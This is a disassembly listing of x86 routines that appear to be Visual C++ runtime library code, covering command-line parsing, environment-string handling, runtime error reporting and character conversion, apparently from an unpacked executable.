loc_4329C1: ; CODE XREF: sub_43284B+161�j
; sub_43284B+166�j
and byte_676CA0[eax], 0
loc_4329C8: ; CODE XREF: sub_43284B+15C�j
inc eax
cmp eax, esi
jb short loc_43298B
loc_4329CD: ; CODE XREF: sub_43284B+137�j
pop esi
leave
retn
sub_43284B endp
; =============== S U B R O U T I N E =======================================
sub_4329D0 proc near ; CODE XREF: sub_432B07+9�p
; sub_432B5F+D�p ...
cmp dword_676EAC, 0
jnz short locret_4329EB
push 0FFFFFFFDh
call sub_4325F8
pop ecx
mov dword_676EAC, 1
locret_4329EB: ; CODE XREF: sub_4329D0+7�j
retn
sub_4329D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4329EC proc near ; CODE XREF: sub_42BEC5+2B�p
; sub_42BEC5+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp dword_676C8C, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_432A10
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_429C40
add esp, 0Ch
jmp short loc_432A83
; ---------------------------------------------------------------------------
loc_432A10: ; CODE XREF: sub_4329EC+11�j
push esi
push 19h
call sub_42DA1F
mov edx, [ebp+arg_8]
pop ecx
test edx, edx
jz short loc_432A5D
mov ecx, [ebp+arg_4]
loc_432A23: ; CODE XREF: sub_4329EC+63�j
mov al, [ecx]
dec edx
movzx esi, al
test byte_676DA1[esi], 4
mov [edi], al
jz short loc_432A47
inc edi
inc ecx
test edx, edx
jz short loc_432A53
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_432A59
jmp short loc_432A4D
; ---------------------------------------------------------------------------
loc_432A47: ; CODE XREF: sub_4329EC+46�j
inc edi
inc ecx
test al, al
jz short loc_432A5D
loc_432A4D: ; CODE XREF: sub_4329EC+59�j
test edx, edx
jnz short loc_432A23
jmp short loc_432A5D
; ---------------------------------------------------------------------------
loc_432A53: ; CODE XREF: sub_4329EC+4C�j
and byte ptr [edi-1], 0
jmp short loc_432A5D
; ---------------------------------------------------------------------------
loc_432A59: ; CODE XREF: sub_4329EC+57�j
and byte ptr [edi-2], 0
loc_432A5D: ; CODE XREF: sub_4329EC+32�j
; sub_4329EC+5F�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_432A78
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_432A78: ; CODE XREF: sub_4329EC+77�j
push 19h
call sub_42DA80
mov eax, [ebp+arg_0]
pop ecx
loc_432A83: ; CODE XREF: sub_4329EC+22�j
pop edi
pop ebp
retn
sub_4329EC endp
; =============== S U B R O U T I N E =======================================
sub_432A86 proc near ; CODE XREF: sub_42C0F0+E�j
push ebx
push edi
push 2
xor ebx, ebx
call sub_42DA1F
pop ecx
push 3
pop edi
cmp dword_678000, edi
jle short loc_432AFA
push esi
loc_432A9E: ; CODE XREF: sub_432A86+71�j
mov eax, dword_676FEC
mov esi, edi
shl esi, 2
mov eax, [esi+eax]
test eax, eax
jz short loc_432AF0
test byte ptr [eax+0Ch], 83h
jz short loc_432AC2
push eax
call sub_42A03B
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_432AC2
inc ebx
loc_432AC2: ; CODE XREF: sub_432A86+2D�j
; sub_432A86+39�j
cmp edi, 14h
jl short loc_432AF0
mov eax, dword_676FEC
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_437164 ; RtlDeleteCriticalSection
mov eax, dword_676FEC
push dword ptr [esi+eax]
call sub_429822
mov eax, dword_676FEC
pop ecx
and dword ptr [esi+eax], 0
loc_432AF0: ; CODE XREF: sub_432A86+27�j
; sub_432A86+3F�j
inc edi
cmp edi, dword_678000
jl short loc_432A9E
pop esi
loc_432AFA: ; CODE XREF: sub_432A86+15�j
push 2
call sub_42DA80
pop ecx
mov eax, ebx
pop edi
pop ebx
retn
sub_432A86 endp
; =============== S U B R O U T I N E =======================================
sub_432B07 proc near ; CODE XREF: .text:0042C55B�p
cmp dword_676EAC, 0
jnz short loc_432B15
call sub_4329D0
loc_432B15: ; CODE XREF: sub_432B07+7�j
push esi
mov esi, dword_676FE8
mov al, [esi]
cmp al, 22h
jnz short loc_432B47
loc_432B22: ; CODE XREF: sub_432B07+33�j
; sub_432B07+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_432B3F
test al, al
jz short loc_432B3F
movzx eax, al
push eax
call sub_434C5E
test eax, eax
pop ecx
jz short loc_432B22
inc esi
jmp short loc_432B22
; ---------------------------------------------------------------------------
loc_432B3F: ; CODE XREF: sub_432B07+21�j
; sub_432B07+25�j
cmp byte ptr [esi], 22h
jnz short loc_432B51
loc_432B44: ; CODE XREF: sub_432B07+52�j
inc esi
jmp short loc_432B51
; ---------------------------------------------------------------------------
loc_432B47: ; CODE XREF: sub_432B07+19�j
cmp al, 20h
jbe short loc_432B51
loc_432B4B: ; CODE XREF: sub_432B07+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_432B4B
loc_432B51: ; CODE XREF: sub_432B07+3B�j
; sub_432B07+3E�j ...
mov al, [esi]
test al, al
jz short loc_432B5B
cmp al, 20h
jbe short loc_432B44
loc_432B5B: ; CODE XREF: sub_432B07+4E�j
mov eax, esi
pop esi
retn
sub_432B07 endp
; =============== S U B R O U T I N E =======================================
sub_432B5F proc near ; CODE XREF: .text:0042C544�p
push ebx
xor ebx, ebx
cmp dword_676EAC, ebx
push esi
push edi
jnz short loc_432B71
call sub_4329D0
loc_432B71: ; CODE XREF: sub_432B5F+B�j
mov esi, dword_676904
xor edi, edi
loc_432B79: ; CODE XREF: sub_432B5F+30�j
mov al, [esi]
cmp al, bl
jz short loc_432B91
cmp al, 3Dh
jz short loc_432B84
inc edi
loc_432B84: ; CODE XREF: sub_432B5F+22�j
push esi
call sub_4292D0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_432B79
; ---------------------------------------------------------------------------
loc_432B91: ; CODE XREF: sub_432B5F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_4296E8
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_6769CC, esi
jnz short loc_432BB3
push 9
call sub_42C5AC
pop ecx
loc_432BB3: ; CODE XREF: sub_432B5F+4A�j
mov edi, dword_676904
cmp [edi], bl
jz short loc_432BF6
push ebp
loc_432BBE: ; CODE XREF: sub_432B5F+94�j
push edi
call sub_4292D0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_432BEF
push ebp
call sub_4296E8
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_432BE2
push 9
call sub_42C5AC
pop ecx
loc_432BE2: ; CODE XREF: sub_432B5F+79�j
push edi
push dword ptr [esi]
call sub_42A500
pop ecx
add esi, 4
pop ecx
loc_432BEF: ; CODE XREF: sub_432B5F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_432BBE
pop ebp
loc_432BF6: ; CODE XREF: sub_432B5F+5C�j
push dword_676904
call sub_429822
pop ecx
mov dword_676904, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_676EA8, 1
pop ebx
retn
sub_432B5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432C18 proc near ; CODE XREF: .text:0042C53F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_676EAC, ebx
push esi
push edi
jnz short loc_432C2F
call sub_4329D0
loc_432C2F: ; CODE XREF: sub_432C18+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call dword_437178 ; GetModuleFileNameA
mov eax, dword_676FE8
mov off_6769DC, esi
mov edi, esi
cmp [eax], bl
jz short loc_432C54
mov edi, eax
loc_432C54: ; CODE XREF: sub_432C18+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_432CB1
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_4296E8
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_432C84
push 8
call sub_42C5AC
pop ecx
loc_432C84: ; CODE XREF: sub_432C18+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_432CB1
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_6769C4, esi
pop edi
pop esi
mov dword_6769C0, eax
pop ebx
leave
retn
sub_432C18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432CB1 proc near ; CODE XREF: sub_432C18+47�p
; sub_432C18+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_432CDB
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_432CDB: ; CODE XREF: sub_432CB1+20�j
cmp byte ptr [eax], 22h
jnz short loc_432D24
loc_432CE0: ; CODE XREF: sub_432CB1+58�j
; sub_432CB1+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_432D12
test dl, dl
jz short loc_432D12
movzx edx, dl
test byte_676DA1[edx], 4
jz short loc_432D05
inc dword ptr [ecx]
test esi, esi
jz short loc_432D05
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_432D05: ; CODE XREF: sub_432CB1+46�j
; sub_432CB1+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_432CE0
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_432CE0
; ---------------------------------------------------------------------------
loc_432D12: ; CODE XREF: sub_432CB1+36�j
; sub_432CB1+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_432D1C
and byte ptr [esi], 0
inc esi
loc_432D1C: ; CODE XREF: sub_432CB1+65�j
cmp byte ptr [eax], 22h
jnz short loc_432D67
inc eax
jmp short loc_432D67
; ---------------------------------------------------------------------------
loc_432D24: ; CODE XREF: sub_432CB1+2D�j
; sub_432CB1+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_432D2F
mov dl, [eax]
mov [esi], dl
inc esi
loc_432D2F: ; CODE XREF: sub_432CB1+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_676DA1[ebx], 4
jz short loc_432D4A
inc dword ptr [ecx]
test esi, esi
jz short loc_432D49
mov bl, [eax]
mov [esi], bl
inc esi
loc_432D49: ; CODE XREF: sub_432CB1+91�j
inc eax
loc_432D4A: ; CODE XREF: sub_432CB1+8B�j
cmp dl, 20h
jz short loc_432D58
test dl, dl
jz short loc_432D5C
cmp dl, 9
jnz short loc_432D24
loc_432D58: ; CODE XREF: sub_432CB1+9C�j
test dl, dl
jnz short loc_432D5F
loc_432D5C: ; CODE XREF: sub_432CB1+A0�j
dec eax
jmp short loc_432D67
; ---------------------------------------------------------------------------
loc_432D5F: ; CODE XREF: sub_432CB1+A9�j
test esi, esi
jz short loc_432D67
and byte ptr [esi-1], 0
loc_432D67: ; CODE XREF: sub_432CB1+6E�j
; sub_432CB1+71�j ...
and [ebp+arg_10], 0
loc_432D6B: ; CODE XREF: sub_432CB1+19E�j
cmp byte ptr [eax], 0
jz loc_432E54
loc_432D74: ; CODE XREF: sub_432CB1+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_432D80
cmp dl, 9
jnz short loc_432D83
loc_432D80: ; CODE XREF: sub_432CB1+C8�j
inc eax
jmp short loc_432D74
; ---------------------------------------------------------------------------
loc_432D83: ; CODE XREF: sub_432CB1+CD�j
cmp byte ptr [eax], 0
jz loc_432E54
test edi, edi
jz short loc_432D98
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_432D98: ; CODE XREF: sub_432CB1+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_432D9D: ; CODE XREF: sub_432CB1+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_432DA6: ; CODE XREF: sub_432CB1+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_432DAF
inc eax
inc ebx
jmp short loc_432DA6
; ---------------------------------------------------------------------------
loc_432DAF: ; CODE XREF: sub_432CB1+F8�j
cmp byte ptr [eax], 22h
jnz short loc_432DE0
test bl, 1
jnz short loc_432DDE
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_432DCD
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_432DCD
mov eax, edx
jmp short loc_432DD0
; ---------------------------------------------------------------------------
loc_432DCD: ; CODE XREF: sub_432CB1+10D�j
; sub_432CB1+116�j
mov [ebp+arg_0], edi
loc_432DD0: ; CODE XREF: sub_432CB1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_432DDE: ; CODE XREF: sub_432CB1+106�j
shr ebx, 1
loc_432DE0: ; CODE XREF: sub_432CB1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_432DF5
inc ebx
loc_432DE8: ; CODE XREF: sub_432CB1+142�j
test esi, esi
jz short loc_432DF0
mov byte ptr [esi], 5Ch
inc esi
loc_432DF0: ; CODE XREF: sub_432CB1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_432DE8
loc_432DF5: ; CODE XREF: sub_432CB1+134�j
mov dl, [eax]
test dl, dl
jz short loc_432E45
cmp [ebp+arg_10], 0
jnz short loc_432E0B
cmp dl, 20h
jz short loc_432E45
cmp dl, 9
jz short loc_432E45
loc_432E0B: ; CODE XREF: sub_432CB1+14E�j
cmp [ebp+arg_0], 0
jz short loc_432E3F
test esi, esi
jz short loc_432E2E
movzx ebx, dl
test byte_676DA1[ebx], 4
jz short loc_432E27
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_432E27: ; CODE XREF: sub_432CB1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_432E3D
; ---------------------------------------------------------------------------
loc_432E2E: ; CODE XREF: sub_432CB1+162�j
movzx edx, dl
test byte_676DA1[edx], 4
jz short loc_432E3D
inc eax
inc dword ptr [ecx]
loc_432E3D: ; CODE XREF: sub_432CB1+17B�j
; sub_432CB1+187�j
inc dword ptr [ecx]
loc_432E3F: ; CODE XREF: sub_432CB1+15E�j
inc eax
jmp loc_432D9D
; ---------------------------------------------------------------------------
loc_432E45: ; CODE XREF: sub_432CB1+148�j
; sub_432CB1+153�j ...
test esi, esi
jz short loc_432E4D
and byte ptr [esi], 0
inc esi
loc_432E4D: ; CODE XREF: sub_432CB1+196�j
inc dword ptr [ecx]
jmp loc_432D6B
; ---------------------------------------------------------------------------
loc_432E54: ; CODE XREF: sub_432CB1+BD�j
; sub_432CB1+D5�j
test edi, edi
jz short loc_432E5B
and dword ptr [edi], 0
loc_432E5B: ; CODE XREF: sub_432CB1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_432CB1 endp
; =============== S U B R O U T I N E =======================================
sub_432E65 proc near ; CODE XREF: .text:0042C535�p
; sub_434944+8C�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_676B08
push ebx
push ebp
mov ebp, dword_4371BC
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_432EB3
call ebp ; dword_4371BC
mov esi, eax
cmp esi, ebx
jz short loc_432E94
mov dword_676B08, 1
jmp short loc_432EBC
; ---------------------------------------------------------------------------
loc_432E94: ; CODE XREF: sub_432E65+21�j
call dword_4371C0 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_432F8E
mov dword_676B08, 2
jmp loc_432F42
; ---------------------------------------------------------------------------
loc_432EB3: ; CODE XREF: sub_432E65+19�j
cmp eax, 1
jnz loc_432F3D
loc_432EBC: ; CODE XREF: sub_432E65+2D�j
cmp esi, ebx
jnz short loc_432ECC
call ebp ; dword_4371BC
mov esi, eax
cmp esi, ebx
jz loc_432F8E
loc_432ECC: ; CODE XREF: sub_432E65+59�j
cmp [esi], bx
mov eax, esi
jz short loc_432EE1
loc_432ED3: ; CODE XREF: sub_432E65+73�j
; sub_432E65+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_432ED3
inc eax
inc eax
cmp [eax], bx
jnz short loc_432ED3
loc_432EE1: ; CODE XREF: sub_432E65+6C�j
sub eax, esi
mov edi, dword_437074
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; dword_437074
mov ebp, eax
cmp ebp, ebx
jz short loc_432F32
push ebp
call sub_4296E8
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_432F32
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; dword_437074
test eax, eax
jnz short loc_432F2E
push [esp+18h+var_8]
call sub_429822
pop ecx
mov [esp+18h+var_8], ebx
loc_432F2E: ; CODE XREF: sub_432E65+B9�j
mov ebx, [esp+18h+var_8]
loc_432F32: ; CODE XREF: sub_432E65+99�j
; sub_432E65+A8�j
push esi
call dword_4371C4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_432F90
; ---------------------------------------------------------------------------
loc_432F3D: ; CODE XREF: sub_432E65+51�j
cmp eax, 2
jnz short loc_432F8E
loc_432F42: ; CODE XREF: sub_432E65+49�j
cmp edi, ebx
jnz short loc_432F52
call dword_4371C0 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_432F8E
loc_432F52: ; CODE XREF: sub_432E65+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_432F62
loc_432F58: ; CODE XREF: sub_432E65+F6�j
; sub_432E65+FB�j
inc eax
cmp [eax], bl
jnz short loc_432F58
inc eax
cmp [eax], bl
jnz short loc_432F58
loc_432F62: ; CODE XREF: sub_432E65+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_4296E8
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_432F78
xor esi, esi
jmp short loc_432F83
; ---------------------------------------------------------------------------
loc_432F78: ; CODE XREF: sub_432E65+10D�j
push ebp
push edi
push esi
call sub_429350
add esp, 0Ch
loc_432F83: ; CODE XREF: sub_432E65+111�j
push edi
call dword_4371C8 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_432F90
; ---------------------------------------------------------------------------
loc_432F8E: ; CODE XREF: sub_432E65+39�j
; sub_432E65+61�j ...
xor eax, eax
loc_432F90: ; CODE XREF: sub_432E65+D6�j
; sub_432E65+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_432E65 endp
; =============== S U B R O U T I N E =======================================
sub_432F97 proc near ; CODE XREF: sub_42C5AC+9�p
; sub_42C5D1+9�p
mov eax, dword_67690C
cmp eax, 1
jz short loc_432FAE
test eax, eax
jnz short locret_432FCF
cmp dword_451124, 1
jnz short locret_432FCF
loc_432FAE: ; CODE XREF: sub_432F97+8�j
push 0FCh
call sub_432FD0
mov eax, dword_676B0C
pop ecx
test eax, eax
jz short loc_432FC4
call eax ; dword_676B0C
loc_432FC4: ; CODE XREF: sub_432F97+29�j
push 0FFh
call sub_432FD0
pop ecx
locret_432FCF: ; CODE XREF: sub_432F97+C�j
; sub_432F97+15�j
retn
sub_432F97 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432FD0 proc near ; CODE XREF: sub_42C5AC+12�p
; sub_42C5D1+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_453A70
loc_432FE3: ; CODE XREF: sub_432FD0+20�j
cmp edx, [eax]
jz short loc_432FF2
add eax, 8
inc ecx
cmp eax, offset dword_453B00
jl short loc_432FE3
loc_432FF2: ; CODE XREF: sub_432FD0+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_453A70[esi]
jnz loc_433120
mov eax, dword_67690C
cmp eax, 1
jz loc_4330FA
test eax, eax
jnz short loc_433023
cmp dword_451124, 1
jz loc_4330FA
loc_433023: ; CODE XREF: sub_432FD0+44�j
cmp edx, 0FCh
jz loc_433120
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_437178 ; GetModuleFileNameA
test eax, eax
jnz short loc_43305A
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_42A500
pop ecx
pop ecx
loc_43305A: ; CODE XREF: sub_432FD0+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_4292D0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_43309D
lea eax, [ebp+var_1A4]
push eax
call sub_4292D0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_429C40
add esp, 10h
loc_43309D: ; CODE XREF: sub_432FD0+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_42A500
lea eax, [ebp+var_A0]
push edi
push eax
call sub_42A510
lea eax, [ebp+var_A0]
push offset asc_437D50 ; "\n\n"
push eax
call sub_42A510
push off_453A74[esi]
lea eax, [ebp+var_A0]
push eax
call sub_42A510
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_434CA0
add esp, 2Ch
pop edi
jmp short loc_433120
; ---------------------------------------------------------------------------
loc_4330FA: ; CODE XREF: sub_432FD0+3C�j
; sub_432FD0+4D�j
lea eax, [ebp+arg_0]
lea esi, off_453A74[esi]
push 0
push eax
push dword ptr [esi]
call sub_4292D0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4371FC ; GetStdHandle
push eax
call dword_437078 ; WriteFile
loc_433120: ; CODE XREF: sub_432FD0+2E�j
; sub_432FD0+59�j ...
pop esi
leave
retn
sub_432FD0 endp
; =============== S U B R O U T I N E =======================================
sub_433123 proc near ; CODE XREF: sub_42DA95+6C�p
; sub_42F312+32�p ...
arg_0 = dword ptr 4
inc dword_676900
push 1000h
call sub_4296E8
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_43314C
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_43315D
; ---------------------------------------------------------------------------
loc_43314C: ; CODE XREF: sub_433123+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_43315D: ; CODE XREF: sub_433123+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_433123 endp
; =============== S U B R O U T I N E =======================================
sub_433167 proc near ; CODE XREF: sub_42DA95+61�p
; sub_432034+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_676FC0
jb short loc_433176
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_433176: ; CODE XREF: sub_433167+A�j
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea eax, [eax+eax*8]
mov ecx, dword_676EC0[ecx*4]
mov al, [ecx+eax*4+4]
and eax, 40h
retn
sub_433167 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433190 proc near ; CODE XREF: sub_42DBAD+2D4�p
; sub_42DBAD+6B3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_676EBC
push edi
push esi
call dword_437220 ; InterlockedIncrement
mov edi, dword_43721C
xor ebx, ebx
cmp dword_676EB8, ebx
jz short loc_4331C0
push esi
call edi ; dword_43721C
push 13h
call sub_42DA1F
pop ecx
push 1
pop ebx
loc_4331C0: ; CODE XREF: sub_433190+20�j
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4331E9
pop ecx
mov [ebp+arg_4], eax
test ebx, ebx
pop ecx
jz short loc_4331DE
push 13h
call sub_42DA80
pop ecx
jmp short loc_4331E1
; ---------------------------------------------------------------------------
loc_4331DE: ; CODE XREF: sub_433190+42�j
push esi
call edi ; dword_43721C
loc_4331E1: ; CODE XREF: sub_433190+4C�j
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_433190 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4331E9 proc near ; CODE XREF: sub_433190+36�p
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
test eax, eax
jnz short loc_4331F5
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4331F5: ; CODE XREF: sub_4331E9+8�j
cmp dword_676988, 0
jnz short loc_433210
mov cx, [ebp+arg_4]
cmp cx, 0FFh
ja short loc_433242
push 1
mov [eax], cl
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_433210: ; CODE XREF: sub_4331E9+13�j
lea ecx, [ebp+arg_0]
and [ebp+arg_0], 0
push ecx
push 0
push dword_4535A4
push eax
lea eax, [ebp+arg_4]
push 1
push eax
push 220h
push dword_676998
call dword_437074 ; WideCharToMultiByte
test eax, eax
jz short loc_433242
cmp [ebp+arg_0], 0
jz short loc_433250
loc_433242: ; CODE XREF: sub_4331E9+1E�j
; sub_4331E9+51�j
call sub_42F049
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
loc_433250: ; CODE XREF: sub_4331E9+57�j
pop ebp
retn
sub_4331E9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433252 proc near ; CODE XREF: sub_42E525+6A3�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, offset dword_676EBC
push edi
push esi
call dword_437220 ; InterlockedIncrement
mov edi, dword_43721C
xor ebx, ebx
cmp dword_676EB8, ebx
jz short loc_433282
push esi
call edi ; dword_43721C
push 13h
call sub_42DA1F
pop ecx
push 1
pop ebx
loc_433282: ; CODE XREF: sub_433252+20�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4332AF
add esp, 0Ch
mov [ebp+arg_8], eax
test ebx, ebx
jz short loc_4332A4
push 13h
call sub_42DA80
pop ecx
jmp short loc_4332A7
; ---------------------------------------------------------------------------
loc_4332A4: ; CODE XREF: sub_433252+46�j
push esi
call edi ; dword_43721C
loc_4332A7: ; CODE XREF: sub_433252+50�j
mov eax, [ebp+arg_8]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_433252 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4332AF proc near ; CODE XREF: sub_433252+39�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
jz short loc_4332D2
cmp [ebp+arg_8], ebx
jz short loc_4332D2
mov al, [esi]
cmp al, bl
jnz short loc_4332D8
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4332D2
mov [eax], bx
loc_4332D2: ; CODE XREF: sub_4332AF+C�j
; sub_4332AF+11�j ...
xor eax, eax
loc_4332D4: ; CODE XREF: sub_4332AF+42�j
; sub_4332AF+86�j ...
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_4332D8: ; CODE XREF: sub_4332AF+17�j
cmp dword_676988, ebx
jnz short loc_4332F3
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_4332EE
movzx ax, al
mov [ecx], ax
loc_4332EE: ; CODE XREF: sub_4332AF+36�j
; sub_4332AF+C1�j
push 1
pop eax
jmp short loc_4332D4
; ---------------------------------------------------------------------------
loc_4332F3: ; CODE XREF: sub_4332AF+2F�j
mov ecx, off_453398
movzx eax, al
test byte ptr [ecx+eax*2+1], 80h
jz short loc_433351
mov eax, dword_4535A4
cmp eax, 1
jle short loc_433337
cmp [ebp+arg_8], eax
jl short loc_433341
xor ecx, ecx
cmp [ebp+arg_0], ebx
setnz cl
push ecx
push [ebp+arg_0]
push eax
push esi
push 9
push dword_676998
call dword_437180 ; MultiByteToWideChar
test eax, eax
mov eax, dword_4535A4
jnz short loc_4332D4
loc_433337: ; CODE XREF: sub_4332AF+5C�j
cmp [ebp+arg_8], eax
jb short loc_433341
cmp [esi+1], bl
jnz short loc_4332D4
loc_433341: ; CODE XREF: sub_4332AF+61�j
; sub_4332AF+8B�j ...
call sub_42F049
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4332D4
; ---------------------------------------------------------------------------
loc_433351: ; CODE XREF: sub_4332AF+52�j
xor eax, eax
cmp [ebp+arg_0], ebx
setnz al
push eax
push [ebp+arg_0]
push 1
push esi
push 9
push dword_676998
call dword_437180 ; MultiByteToWideChar
test eax, eax
jnz loc_4332EE
jmp short loc_433341
